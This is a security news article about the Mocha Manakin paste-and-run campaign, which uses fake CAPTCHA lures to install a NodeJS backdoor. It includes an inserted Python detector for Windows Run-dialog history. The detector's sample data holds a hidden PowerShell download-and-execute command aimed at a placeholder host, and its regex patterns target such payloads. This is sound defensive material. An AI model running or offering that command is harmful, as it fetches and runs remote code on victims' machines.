Mocha Manakin Uses Paste-and-Run Technique to Deceive Users into Downloading Malware


A malicious campaign tracked as Mocha Manakin has been identified employing the deceptive “paste-and-run” technique to trick unsuspecting users into executing harmful scripts.

First observed in August 2024 and actively monitored since January 2025 by security researchers at Red Canary, this threat cluster uses sophisticated social engineering lures to gain initial access to systems.

Emerging Threat Leverages Social Engineering

Often disguised as CAPTCHA verifications or access “fixes” for documents, websites, or software updates, these lures prompt users to copy and paste obfuscated PowerShell commands into their run dialog, inadvertently downloading malicious payloads from adversary-controlled infrastructure.

The technique’s effectiveness lies in its ability to exploit digital conditioning, manipulating users into following seemingly innocuous instructions that lead to severe consequences.
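An added detection example, not taken from the article or from Red Canary: commands typed into the Windows Run dialog are recorded in the per-user RunMRU registry key, so exported values can be triaged for the PowerShell paste-and-run pattern described above. The indicator patterns, the two-indicator threshold and the sample values are assumptions constructed for illustration.

```python
import re

# Run-dialog history is stored per user under
# HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU.
# Each value's data is the typed command followed by the literal suffix "\1".
INTERPRETER = re.compile(r"\b(powershell|pwsh|mshta|cmd)(\.exe)?\b", re.I)

# Heuristic indicators (assumptions for this example, not from the article).
INDICATORS = {
    "hidden_window": re.compile(r"(?<!\S)-w\w*\s+(hidden|h|1)\b", re.I),
    "encoded_command": re.compile(r"(?<!\S)-e\w*\s+[A-Za-z0-9+/=]{16,}", re.I),
    "web_download": re.compile(
        r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|curl)\b", re.I),
    "dynamic_exec": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    # Lures often append a comment so the visible tail looks like a check.
    "lure_comment": re.compile(r"#.*\b(captcha|verif|robot|human)", re.I),
}

def triage_runmru(values, threshold=2):
    """values: dict of RunMRU value name -> data string.
    Returns [(value_name, command, [indicator names])] for suspicious entries."""
    findings = []
    for name, data in values.items():
        if name.lower() == "mrulist":      # ordering string, not a command
            continue
        command = data[:-2] if data.endswith("\\1") else data
        if not INTERPRETER.search(command):
            continue                       # not a script-host launch
        hits = sorted(k for k, rx in INDICATORS.items() if rx.search(command))
        if len(hits) >= threshold:
            findings.append((name, command, hits))
    return findings

# Constructed sample export; the URL uses the reserved .invalid TLD.
SAMPLE = {
    "MRUList": "dcba",
    "a": "cmd\\1",
    "b": "powershell -w hidden -c \"iex (irm https://example.invalid/v)\""
         " # Verify you are human\\1",
    "c": "\\\\fileserver\\share\\1",
    "d": "powershell -NoExit\\1",
}

if __name__ == "__main__":
    for name, command, hits in triage_runmru(SAMPLE):
        print(f"[!] RunMRU value {name!r}: {', '.join(hits)}\n    {command}")
```

Benign entries such as a bare `cmd` or a UNC path produce no finding; only the entry combining a script host with several indicators is reported.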

A Custom Backdoor for Persistence

Once executed, Mocha Manakin’s paste-and-run commands download a bespoke NodeJS-based backdoor named NodeInitRAT.

This remote access trojan, delivered via a ...


Copyright of this story solely belongs to gbhackers.